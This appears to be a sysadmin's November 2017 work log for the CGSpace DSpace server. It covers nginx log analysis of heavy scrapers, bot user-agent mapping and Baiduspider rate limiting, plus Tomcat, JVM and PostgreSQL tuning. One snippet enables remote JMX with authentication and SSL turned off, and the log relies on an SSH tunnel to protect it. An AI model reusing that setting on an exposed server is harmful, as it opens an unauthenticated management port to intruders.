+     16 104.196.152.243
+     25 41.60.238.61
+     26 157.55.39.161
+     27 207.46.13.103
+     27 207.46.13.80
+     31 207.46.13.36
+   1498 50.116.102.77
+
    +
  • The OAI requests during that same time period are nothing to worry about:
  • +
+
# cat /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+      1 66.249.66.92
+      4 66.249.66.90
+      6 68.180.229.254
+
    +
  • The top IPs from dspace.log during the 2–8 AM period:
  • +
+
$ grep -E '2017-11-07 0[2-8]' dspace.log.2017-11-07 | grep -o -E 'ip_addr=[0-9.]+' | sort -n | uniq -c | sort -h | tail
+    143 ip_addr=213.55.99.121
+    181 ip_addr=66.249.66.91
+    223 ip_addr=157.55.39.161
+    248 ip_addr=207.46.13.80
+    251 ip_addr=207.46.13.103
+    291 ip_addr=207.46.13.36
+    297 ip_addr=197.210.168.174
+    312 ip_addr=65.49.68.199
+    462 ip_addr=104.196.152.243
+    488 ip_addr=66.249.66.90
+
    +
  • These aren’t actually very interesting, as the top few are Google, CIAT, Bingbot, and a few other unknown scrapers
  • +
  • The number of requests isn’t even that high to be honest
  • +
  • As I was looking at these logs I noticed another heavy user (124.17.34.59) that was not active during this time period, but made many requests today alone:
  • +
+
# zgrep -c 124.17.34.59 /var/log/nginx/access.log*
+/var/log/nginx/access.log:22581
+/var/log/nginx/access.log.1:0
+/var/log/nginx/access.log.2.gz:14
+/var/log/nginx/access.log.3.gz:0
+/var/log/nginx/access.log.4.gz:0
+/var/log/nginx/access.log.5.gz:3
+/var/log/nginx/access.log.6.gz:0
+/var/log/nginx/access.log.7.gz:0
+/var/log/nginx/access.log.8.gz:0
+/var/log/nginx/access.log.9.gz:1
+
    +
  • The whois data shows the IP is from China, but the user agent doesn’t really give any clues:
  • +
+
# grep 124.17.34.59 /var/log/nginx/access.log | awk -F'" ' '{print $3}' | sort | uniq -c | sort -h
+    210 "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
+  22610 "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/7.0; LCTE)"
+
    +
  • A Google search for “LCTE bot” doesn’t return anything interesting, but this Stack Overflow discussion references the lack of information
  • +
  • So basically, after a few hours of looking at the log files I am no closer to understanding what is going on!
  • +
  • I do know that we want to block Baidu, though, as it does not respect robots.txt
  • +
  • And as we speak Linode alerted that the outbound traffic rate has been very high for the past two hours (roughly 12:00 to 14:00)
  • +
  • At least for now it seems to be that new Chinese IP (124.17.34.59):
  • +
+
# grep -E "07/Nov/2017:1[234]:" /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+    198 207.46.13.103
+    203 207.46.13.80
+    205 207.46.13.36
+    218 157.55.39.161
+    249 45.5.184.221
+    258 45.5.187.130
+    386 66.249.66.90
+    410 197.210.168.174
+   1896 104.196.152.243
+  11005 124.17.34.59
+
    +
  • Seems 124.17.34.59 is really downloading all our PDFs, compared to the next most active IPs during this time!
  • +
+
# grep -E "07/Nov/2017:1[234]:" /var/log/nginx/access.log | grep 124.17.34.59 | grep -c pdf
+5948
+# grep -E "07/Nov/2017:1[234]:" /var/log/nginx/access.log | grep 104.196.152.243 | grep -c pdf
+0
+
    +
  • About CIAT, I think I need to encourage them to specify a user agent string for their requests, because they are not reusing their Tomcat sessions and are creating thousands of sessions per day
  • +
  • All CIAT requests vs unique ones:
  • +
+
$ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-11-07 | wc -l
+3506
+$ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-11-07 | sort | uniq | wc -l
+3506
+
    +
  • I emailed CIAT about the session issue, user agent issue, and told them they should not scrape the HTML contents of communities, instead using the REST API
  • +
  • About Baidu, I found a link to their robots.txt tester tool
  • +
  • It seems like our robots.txt file is valid, and they claim to recognize that URLs like /discover should be forbidden (不允许, aka “not allowed”):
  • +
+

Baidu robots.txt tester

+
    +
  • But they literally just made this request today:
  • +
+
180.76.15.136 - - [07/Nov/2017:06:25:11 +0000] "GET /discover?filtertype_0=crpsubject&filter_relational_operator_0=equals&filter_0=WATER%2C+LAND+AND+ECOSYSTEMS&filtertype=subject&filter_relational_operator=equals&filter=WATER+RESOURCES HTTP/1.1" 200 82265 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
+
    +
  • Along with another thousand or so requests to URLs that are forbidden in robots.txt today alone:
  • +
+
# grep -c Baiduspider /var/log/nginx/access.log
+3806
+# grep Baiduspider /var/log/nginx/access.log | grep -c -E "GET /(browse|discover|search-filter)"
+1085
+
    +
  • I will think about blocking their IPs but they have 164 of them!
  • +
+
# grep "Baiduspider/2.0" /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq | wc -l
+164
+
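  • If it comes to that, blocking by user agent in nginx would be much simpler than listing 164 IPs; a rough sketch:
# hypothetical: refuse Baiduspider outright at the nginx level
if ($http_user_agent ~* "baiduspider") {
    return 403;
}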

2017-11-08

+
    +
  • Linode sent several alerts last night about CPU usage and outbound traffic rate at 6:13PM
  • +
  • Linode sent another alert about CPU usage in the morning at 6:12AM
  • +
  • Jesus, the new Chinese IP (124.17.34.59) has downloaded 24,000 PDFs in the last 24 hours:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "0[78]/Nov/2017:" | grep 124.17.34.59 | grep -v pdf.jpg | grep -c pdf
+24981
+
    +
  • This is about 20,000 Tomcat sessions:
  • +
+
$ cat dspace.log.2017-11-07 dspace.log.2017-11-08 | grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=124.17.34.59' | sort | uniq | wc -l
+20733
+
    +
  • I’m getting really sick of this
  • +
  • Sisay re-uploaded the CIAT records that I had already corrected earlier this week, erasing all my corrections
  • +
  • I had to re-correct all the publishers, places, names, dates, etc and apply the changes on DSpace Test
  • +
  • Run system updates on DSpace Test and reboot the server
  • +
  • Magdalena had written to say that two of their Phase II project tags were missing on CGSpace, so I added them (#346)
  • +
  • I figured out a way to use nginx’s map function to assign a “bot” user agent to misbehaving clients who don’t define a user agent
  • +
  • Most bots are automatically lumped into one generic session by Tomcat’s Crawler Session Manager Valve, but this only works if their user agent matches a pre-defined regular expression like .*[bB]ot.* (an example valve config is sketched below)
  • +
  • Some clients send thousands of requests without a user agent which ends up creating thousands of Tomcat sessions, wasting precious memory, CPU, and database resources in the process
  • +
  • Basically, we modify the nginx config to add a mapping with a modified user agent $ua:
  • +
+
map $remote_addr $ua {
+    # 2017-11-08 Random Chinese host grabbing 20,000 PDFs
+    124.17.34.59     'ChineseBot';
+    default          $http_user_agent;
+}
+
    +
  • If the client’s address matches then the user agent is set, otherwise the default $http_user_agent variable is used
  • +
  • Then, in the server’s / block we pass this header to Tomcat:
  • +
+
proxy_pass http://tomcat_http;
+proxy_set_header User-Agent $ua;
+
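    +
  • For reference, the Crawler Session Manager Valve mentioned above is enabled in Tomcat’s server.xml; a minimal sketch (the user agent regex here is Tomcat’s default, and the placement and sessionInactiveInterval value are assumptions rather than our exact production config):
  • +
+
<!-- inside the <Host> element of Tomcat's server.xml -->
+<Valve className="org.apache.catalina.valves.CrawlerSessionManagerValve"
+       crawlerUserAgents=".*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*"
+       sessionInactiveInterval="60" />
+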
    +
  • Note to self: the $ua variable won’t show up in nginx access logs because the default combined log format doesn’t show it, so don’t run around pulling your hair out wondering why the modified user agents aren’t showing up in the logs!
  • +
  • If a client matching one of these IPs connects without a session, it will be assigned one by the Crawler Session Manager Valve
  • +
  • You can verify by cross referencing nginx’s access.log and DSpace’s dspace.log.2017-11-08, for example
  • +
  • I will deploy this on CGSpace later this week
  • +
  • I am interested to check how this affects the number of sessions used by the CIAT and Chinese bots (see above on 2017-11-07 for example)
  • +
  • I merged the clickable thumbnails code to 5_x-prod (#347) and will deploy it later along with the new bot mapping stuff (and re-run the Ansible nginx and tomcat tags)
  • +
  • I was thinking about Baidu again and decided to see how many requests they have versus Google to URL paths that are explicitly forbidden in robots.txt:
  • +
+
# zgrep Baiduspider /var/log/nginx/access.log* | grep -c -E "GET /(browse|discover|search-filter)"
+22229
+# zgrep Googlebot /var/log/nginx/access.log* | grep -c -E "GET /(browse|discover|search-filter)"
+0
+
    +
  • It seems that they rarely even bother checking robots.txt, but Google does multiple times per day!
  • +
+
# zgrep Baiduspider /var/log/nginx/access.log* | grep -c robots.txt
+14
+# zgrep Googlebot  /var/log/nginx/access.log* | grep -c robots.txt
+1134
+
    +
  • I have been looking for a reason to ban Baidu and this is definitely a good one
  • +
  • Disallowing Baiduspider in robots.txt probably won’t work because this bot doesn’t seem to respect the robot exclusion standard anyways!
  • +
  • I will whip up something in nginx later
  • +
  • Run system updates on CGSpace and reboot the server
  • +
  • Re-deploy latest 5_x-prod branch on CGSpace and DSpace Test (includes the clickable thumbnails, CCAFS phase II project tags, and updated news text)
  • +
+

2017-11-09

+
    +
  • Awesome, it seems my bot mapping stuff in nginx actually reduced the number of Tomcat sessions used by the CIAT scraper today; here are the total requests and unique sessions:
  • +
+
# zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '09/Nov/2017' | grep -c 104.196.152.243
+8956
+$ grep 104.196.152.243 dspace.log.2017-11-09 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+223
+
    +
  • Versus the same stats for yesterday and the day before:
  • +
+
# zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '08/Nov/2017' | grep -c 104.196.152.243 
+10216
+$ grep 104.196.152.243 dspace.log.2017-11-08 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+2592
+# zcat -f -- /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep '07/Nov/2017' | grep -c 104.196.152.243
+8120
+$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+3506
+
    +
  • The number of sessions is over ten times less!
  • +
  • This gets me thinking, I wonder if I can use something like nginx’s rate limiter to automatically change the user agent of clients who make too many requests
  • +
  • Perhaps using a combination of geo and map, like illustrated here: https://www.nginx.com/blog/rate-limiting-nginx/
  • +
+

2017-11-11

+
    +
  • I was looking at the Google index and noticed there are 4,090 search results for dspace.ilri.org but only seven for mahider.ilri.org
  • +
  • Search with something like: inurl:dspace.ilri.org inurl:https
  • +
  • I want to get rid of those legacy domains eventually!
  • +
+

2017-11-12

+
    +
  • Update the Ansible infrastructure templates to be a little more modular and flexible
  • +
  • Looking at the top client IPs on CGSpace so far this morning, even though it’s only been eight hours:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "12/Nov/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+    243 5.83.120.111
+    335 40.77.167.103
+    424 66.249.66.91
+    529 207.46.13.36
+    554 40.77.167.129
+    604 207.46.13.53
+    754 104.196.152.243
+    883 66.249.66.90
+   1150 95.108.181.88
+   1381 5.9.6.51
+
    +
  • 5.9.6.51 seems to be a Russian bot:
  • +
+
# grep 5.9.6.51 /var/log/nginx/access.log | tail -n 1
+5.9.6.51 - - [12/Nov/2017:08:13:13 +0000] "GET /handle/10568/16515/recent-submissions HTTP/1.1" 200 5097 "-" "Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"
+
    +
  • What’s amazing is that it seems to reuse its Java session across all requests:
  • +
+
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2017-11-12
+1558
+$ grep 5.9.6.51 dspace.log.2017-11-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+1
+
    +
  • Bravo to MegaIndex.ru!
  • +
  • The same cannot be said for 95.108.181.88, which appears to be YandexBot, even though Tomcat’s Crawler Session Manager valve regex should match ‘YandexBot’:
  • +
+
# grep 95.108.181.88 /var/log/nginx/access.log | tail -n 1
+95.108.181.88 - - [12/Nov/2017:08:33:17 +0000] "GET /bitstream/handle/10568/57004/GenebankColombia_23Feb2015.pdf HTTP/1.1" 200 972019 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
+$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2017-11-12
+991
+
    +
  • Move some items and collections on CGSpace for Peter Ballantyne, running move_collections.sh with the following configuration:
  • +
+
10947/6    10947/1 10568/83389
+10947/34   10947/1 10568/83389
+10947/2512 10947/1 10568/83389
+
    +
  • Testing how CGSpace responds to two quick requests made with the Baiduspider user agent:
  • +
+
$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Encoding: gzip
+Content-Language: en-US
+Content-Type: text/html;charset=utf-8
+Date: Sun, 12 Nov 2017 16:30:19 GMT
+Server: nginx
+Strict-Transport-Security: max-age=15768000
+Transfer-Encoding: chunked
+Vary: Accept-Encoding
+X-Cocoon-Version: 2.2.0
+X-Content-Type-Options: nosniff
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
+HTTP/1.1 503 Service Temporarily Unavailable
+Connection: keep-alive
+Content-Length: 206
+Content-Type: text/html
+Date: Sun, 12 Nov 2017 16:30:21 GMT
+Server: nginx
+
    +
  • The first request works, second is denied with an HTTP 503!
  • +
  • I need to remember to check the Munin graphs for PostgreSQL and JVM next week to see how this affects them
  • +
+
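    +
  • The nginx config behind this isn’t shown above, but a minimal sketch of user agent based rate limiting that would produce this 200-then-503 behaviour looks something like the following (the zone name, rate, and regex are assumptions, not necessarily what is deployed on CGSpace):
  • +
+
# in the http context
+map $http_user_agent $limit_baidu {
+    default         '';
+    ~*Baiduspider   $binary_remote_addr;
+}
+limit_req_zone $limit_baidu zone=baidu:10m rate=1r/m;
+
+# in the server or location context
+limit_req zone=baidu;
+
    +
  • Requests whose key maps to an empty string are not limited, so normal clients are unaffected, while Baiduspider gets one request per minute and HTTP 503 (nginx’s default limit_req_status) for the rest
  • +
+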

2017-11-13

+
    +
  • At the end of the day I checked the logs and it really looks like the Baidu rate limiting is working, HTTP 200 vs 503:
  • +
+
# zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep "13/Nov/2017" | grep "Baiduspider" | grep -c " 200 "
+1132
+# zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep "13/Nov/2017" | grep "Baiduspider" | grep -c " 503 "
+10105
+
    +
  • Helping Sisay proof 47 records for IITA: https://dspacetest.cgiar.org/handle/10568/97029
  • +
  • From looking at the data in OpenRefine I found: +
      +
    • Errors in cg.authorship.types
    • +
    • Errors in cg.coverage.country (smart quote in “COTE D’IVOIRE”, “HAWAII” is not a country)
    • +
    • Whitespace issues in some cg.contributor.affiliation
    • +
    • Whitespace issues in some cg.identifier.doi fields and most values are using HTTP instead of HTTPS
    • +
    • Whitespace issues in some dc.contributor.author fields
    • +
    • Issue with invalid dc.date.issued value “2011-3”
    • +
    • Description fields are poorly copy-pasted
    • +
    • Whitespace issues in dc.description.sponsorship
    • +
    • Lots of inconsistency in dc.format.extent (mixed dash style, periods at the end of values)
    • +
    • Whitespace errors in dc.identifier.citation
    • +
    • Whitespace errors in dc.subject
    • +
    • Whitespace errors in dc.title
    • +
    +
  • +
  • After uploading and looking at the data in DSpace Test I saw more errors with CRPs, subjects (one item had four copies of all of its subjects, another had a “.” in it), affiliations, sponsors, etc.
  • +
  • Atmire responded to the ticket about ORCID stuff a few days ago, today I told them that I need to talk to Peter and the partners to see what we would like to do
  • +
+

2017-11-14

+
    +
  • Deploy some nginx configuration updates to CGSpace
  • +
  • They had been waiting on a branch for a few months and I think I just forgot about them
  • +
  • I have been running them on DSpace Test for a few days and haven’t seen any issues there
  • +
  • Started testing DSpace 6.2 and a few things have changed
  • +
  • Now PostgreSQL needs pgcrypto:
  • +
+
$ psql dspace6
+dspace6=# CREATE EXTENSION pgcrypto;
+
    +
  • Also, local settings are no longer in build.properties, they are now in local.cfg
  • +
  • I’m not sure if we can use separate profiles like we did before with mvn -Denv=blah to use blah.properties
  • +
  • It seems we need to use “system properties” to override settings, ie: -Ddspace.dir=/Users/aorth/dspace6
  • +
+
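    +
  • For example, a minimal local.cfg might look something like this (the database values are assumptions for a local test environment, not a definitive configuration):
  • +
+
# [dspace-source]/local.cfg
+dspace.dir = /Users/aorth/dspace6
+db.url = jdbc:postgresql://localhost:5432/dspace6
+db.username = dspace
+db.password = dspace
+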

2017-11-15

+
    +
  • Send Adam Hunt an invite to the DSpace Developers network on Yammer
  • +
  • He is the new head of communications at WLE, since Michael left
  • +
  • Merge changes to item view’s wording of link metadata (#348)
  • +
+

2017-11-17

+
    +
  • Uptime Robot said that CGSpace went down today and I see lots of Timeout waiting for idle object errors in the DSpace logs
  • +
  • I looked in PostgreSQL using SELECT * FROM pg_stat_activity; and saw that there were 73 active connections
  • +
  • After a few minutes the connections went down to 44 and CGSpace was kinda back up; it seems like Tsega restarted Tomcat
  • +
  • Looking at the REST and XMLUI log files, I don’t see anything too crazy:
  • +
+
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep "17/Nov/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+     13 66.249.66.223
+     14 207.46.13.36
+     17 207.46.13.137
+     22 207.46.13.23
+     23 66.249.66.221
+     92 66.249.66.219
+    187 104.196.152.243
+   1400 70.32.83.92
+   1503 50.116.102.77
+   6037 45.5.184.196
+# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "17/Nov/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+    325 139.162.247.24
+    354 66.249.66.223
+    422 207.46.13.36
+    434 207.46.13.23
+    501 207.46.13.137
+    647 66.249.66.221
+    662 34.192.116.178
+    762 213.55.99.121
+   1867 104.196.152.243
+   2020 66.249.66.219
+
    +
  • I think I need to look into using JMX to analyze active sessions, rather than looking at log files
  • +
  • After adding appropriate JMX listener options to Tomcat’s JAVA_OPTS and restarting Tomcat, I can connect remotely using an SSH dynamic port forward (SOCKS) on port 7777 for example, and then start jconsole locally like:
  • +
+
$ jconsole -J-DsocksProxyHost=localhost -J-DsocksProxyPort=7777 service:jmx:rmi:///jndi/rmi://localhost:9000/jmxrmi -J-DsocksNonProxyHosts=
+
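    +
  • The JMX listener options I added are along these lines (a sketch; the port matches the jconsole command above, but treat the exact flags as assumptions rather than the production config):
  • +
+
JAVA_OPTS="$JAVA_OPTS -Dcom.sun.management.jmxremote \
+  -Dcom.sun.management.jmxremote.port=9000 \
+  -Dcom.sun.management.jmxremote.ssl=false \
+  -Dcom.sun.management.jmxremote.authenticate=false \
+  -Djava.rmi.server.hostname=localhost"
+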
    +
  • Looking at the MBeans you can drill down in Catalina→Manager→webapp→localhost→Attributes and see active sessions, etc
  • +
  • I want to enable JMX listener on CGSpace but I need to do some more testing on DSpace Test and see if it causes any performance impact, for example
  • +
  • If I hit the server with some requests as a normal user I see the session counter increase, but if I specify a bot user agent then the sessions seem to be reused (meaning the Crawler Session Manager is working)
  • +
  • Here is the Jconsole screen after looping http --print Hh https://dspacetest.cgiar.org/handle/10568/1 for a few minutes:
  • +
+

Jconsole sessions for XMLUI

+
    +
  • Switch DSpace Test to using the G1GC for JVM so I can see what the JVM graph looks like eventually, and start evaluating it for production
  • +
+

2017-11-19

+
    +
  • Linode sent an alert that CGSpace was using a lot of CPU around 4–6 AM
  • +
  • Looking in the nginx access logs I see the most active XMLUI users between 4 and 6 AM:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "19/Nov/2017:0[456]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+    111 66.249.66.155
+    171 5.9.6.51
+    188 54.162.241.40
+    229 207.46.13.23
+    233 207.46.13.137
+    247 40.77.167.6
+    251 207.46.13.36
+    275 68.180.229.254
+    325 104.196.152.243
+   1610 66.249.66.153
+
    +
  • 66.249.66.153 appears to be Googlebot:
  • +
+
66.249.66.153 - - [19/Nov/2017:06:26:01 +0000] "GET /handle/10568/2203 HTTP/1.1" 200 6309 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
+
    +
  • We know Googlebot is persistent but behaves well, so I guess it was just a coincidence that it came at a time when we had other traffic and server activity
  • +
  • In related news, I see an Atmire update process going for many hours and responsible for hundreds of thousands of log entries (two thirds of all log entries)
  • +
+
$ wc -l dspace.log.2017-11-19 
+388472 dspace.log.2017-11-19
+$ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19 
+267494
+
    +
  • WTF is this process doing every day, and for so many hours?
  • +
  • In unrelated news, when I was looking at the DSpace logs I saw a bunch of errors like this:
  • +
+
2017-11-19 03:00:32,806 INFO  org.apache.pdfbox.pdfparser.PDFParser @ Document is encrypted
+2017-11-19 03:00:32,807 ERROR org.apache.pdfbox.filter.FlateFilter @ FlateFilter: stop reading corrupt stream due to a DataFormatException
+
    +
  • It’s been a few days since I enabled the G1GC on DSpace Test and the JVM graph definitely changed:
  • +
+

Tomcat G1GC

+

2017-11-20

+
    +
  • I found an article about JVM tuning that gives some pointers on how to enable GC logging, plus tools to analyze the logs for you
  • +
  • Also notes on rotating GC logs
  • +
  • I decided to switch DSpace Test back to the CMS garbage collector because it is designed for low pauses and high throughput (like G1GC!) and because we haven’t even tried to monitor or tune it
  • +
+
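    +
  • For reference, GC logging with rotation on Java 8 can be enabled with options along these lines (a sketch only; the log path and rotation sizes are assumptions, and -XX:+UseConcMarkSweepGC is the flag for going back to CMS):
  • +
+
JAVA_OPTS="$JAVA_OPTS -XX:+UseConcMarkSweepGC \
+  -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCDateStamps \
+  -Xloggc:/var/log/tomcat7/gc.log \
+  -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=20M"
+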

2017-11-21

+
    +
  • Magdalena was having problems logging in via LDAP and it seems to be a problem with the CGIAR LDAP server:
  • +
+
2017-11-21 11:11:09,621 WARN  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=2FEC0E5286C17B6694567FFD77C3171C:ip_addr=77.241.141.58:ldap_authentication:type=failed_auth javax.naming.CommunicationException\colon; simple bind failed\colon; svcgroot2.cgiarad.org\colon;3269 [Root exception is javax.net.ssl.SSLHandshakeException\colon; sun.security.validator.ValidatorException\colon; PKIX path validation failed\colon; java.security.cert.CertPathValidatorException\colon; validity check failed]
+

2017-11-22

+
    +
  • Linode sent an alert that the CPU usage on the CGSpace server was very high around 4 to 6 AM
  • +
  • The logs don’t show anything particularly abnormal between those hours:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "22/Nov/2017:0[456]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+    136 31.6.77.23
+    174 68.180.229.254
+    217 66.249.66.91
+    256 157.55.39.79
+    268 54.144.57.183
+    281 207.46.13.137
+    282 207.46.13.36
+    290 207.46.13.23
+    696 66.249.66.90
+    707 104.196.152.243
+
    +
  • I haven’t seen 54.144.57.183 before, it is apparently the CCBot from commoncrawl.org
  • +
  • In other news, it looks like the JVM garbage collection pattern is back to its standard jigsaw pattern after switching back to CMS a few days ago:
  • +
+

Tomcat JVM with CMS GC

+

2017-11-23

+
    +
  • Linode alerted again that CPU usage was high on CGSpace from 4:13 to 6:13 AM
  • +
  • I see a lot of Googlebot (66.249.66.90) in the XMLUI access logs
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "23/Nov/2017:0[456]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+     88 66.249.66.91
+    140 68.180.229.254
+    155 54.196.2.131
+    182 54.224.164.166
+    301 157.55.39.79
+    315 207.46.13.36
+    331 207.46.13.23
+    358 207.46.13.137
+    565 104.196.152.243
+   1570 66.249.66.90
+
    +
  • … and the usual REST scrapers from CIAT (45.5.184.196) and CCAFS (70.32.83.92):
  • +
+
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E "23/Nov/2017:0[456]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+      5 190.120.6.219
+      6 104.198.9.108
+     14 104.196.152.243
+     21 112.134.150.6
+     22 157.55.39.79
+     22 207.46.13.137
+     23 207.46.13.36
+     26 207.46.13.23
+    942 45.5.184.196
+   3995 70.32.83.92
+
    +
  • These IPs crawling the REST API don’t specify user agents and I’d assume they are creating many Tomcat sessions
  • +
  • I would catch them in nginx to assign a “bot” user agent to them so that the Tomcat Crawler Session Manager valve could deal with them, but they don’t really seem to create any — at least not in the dspace.log:
  • +
+
$ grep 70.32.83.92 dspace.log.2017-11-23 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+2
+
    +
  • I’m wondering if REST works differently, or just doesn’t log these sessions?
  • +
  • I wonder if they are measurable via JMX MBeans?
  • +
  • I did some tests locally and I don’t see the sessionCounter incrementing after making requests to REST, but it does with XMLUI and OAI
  • +
  • I came across some interesting PostgreSQL tuning advice for SSDs: https://amplitude.engineering/how-a-single-postgresql-config-change-improved-slow-query-performance-by-50x-85593b8991b0
  • +
  • Apparently setting random_page_cost to 1 is “common” advice for systems running PostgreSQL on SSD (the default is 4)
  • +
  • So I deployed this on DSpace Test and will check the Munin PostgreSQL graphs in a few days to see if anything changes
  • +
+
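    +
  • For reference, one way to apply the tweak on PostgreSQL 9.4+ is with ALTER SYSTEM (a sketch; we could just as well set random_page_cost = 1 in postgresql.conf via the Ansible templates):
  • +
+
$ sudo -u postgres psql
+postgres=# ALTER SYSTEM SET random_page_cost = 1;
+ALTER SYSTEM
+postgres=# SELECT pg_reload_conf();
+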

2017-11-24

+
    +
  • It’s too early to tell for sure, but after I made the random_page_cost change on DSpace Test’s PostgreSQL yesterday the number of connections dropped drastically:
  • +
+

PostgreSQL connections after tweak (week)

+
    +
  • There have been other temporary drops before, but if I look at the past month and actually the whole year, the trend is that connections are four or five times higher on average:
  • +
+

PostgreSQL connections after tweak (month)

+
    +
  • I just realized that we’re not logging access requests to other vhosts on CGSpace, so it’s possible I have no idea that we’re getting slammed at 4AM on another domain that we’re just silently redirecting to cgspace.cgiar.org
  • +
  • I’ve enabled logging on the CGIAR Library on CGSpace so I can check to see if there are many requests there
  • +
  • In just a few seconds I already see a dozen requests from Googlebot (of course they get HTTP 301 redirects to cgspace.cgiar.org)
  • +
  • I also noticed that CGNET appears to be monitoring the old domain every few minutes:
  • +
+
192.156.137.184 - - [24/Nov/2017:20:33:58 +0000] "HEAD / HTTP/1.1" 301 0 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
+
    +
  • I should probably tell CGIAR people to have CGNET stop that
  • +
+

2017-11-26

+
    +
  • Linode alerted that CGSpace server was using too much CPU from 5:18 to 7:18 AM
  • +
  • Yet another mystery because the load for all domains looks fine at that time:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "26/Nov/2017:0[567]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+    190 66.249.66.83
+    195 104.196.152.243
+    220 40.77.167.82
+    246 207.46.13.137
+    247 68.180.229.254
+    257 157.55.39.214
+    289 66.249.66.91
+    298 157.55.39.206
+    379 66.249.66.70
+   1855 66.249.66.90
+

2017-11-29

+
    +
  • Linode alerted that CGSpace was using 279% CPU from 6 to 8 AM this morning
  • +
  • About an hour later Uptime Robot said that the server was down
  • +
  • Here are all the top XMLUI and REST users from today:
  • +
+
# cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "29/Nov/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+    540 66.249.66.83
+    659 40.77.167.36
+    663 157.55.39.214
+    681 157.55.39.206
+    733 157.55.39.158
+    850 66.249.66.70
+   1311 66.249.66.90
+   1340 104.196.152.243
+   4008 70.32.83.92
+   6053 45.5.184.196
+
    +
  • PostgreSQL activity shows 69 connections
  • +
  • I don’t have time to troubleshoot more as I’m in Nairobi working on the HPC so I just restarted Tomcat for now
  • +
  • A few hours later Uptime Robot says the server is down again
  • +
  • I don’t see much activity in the logs but there are 87 PostgreSQL connections
  • +
  • But shit, there were 10,000 unique Tomcat sessions today:
  • +
+
$ cat dspace.log.2017-11-29 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+10037
+
    +
  • Although maybe that’s not much, as the previous two days had more:
  • +
+
$ cat dspace.log.2017-11-27 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+12377
+$ cat dspace.log.2017-11-28 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+16984
+
    +
  • I think we just need to start increasing the number of allowed PostgreSQL connections instead of fighting this, as it’s the most common source of crashes we have
  • +
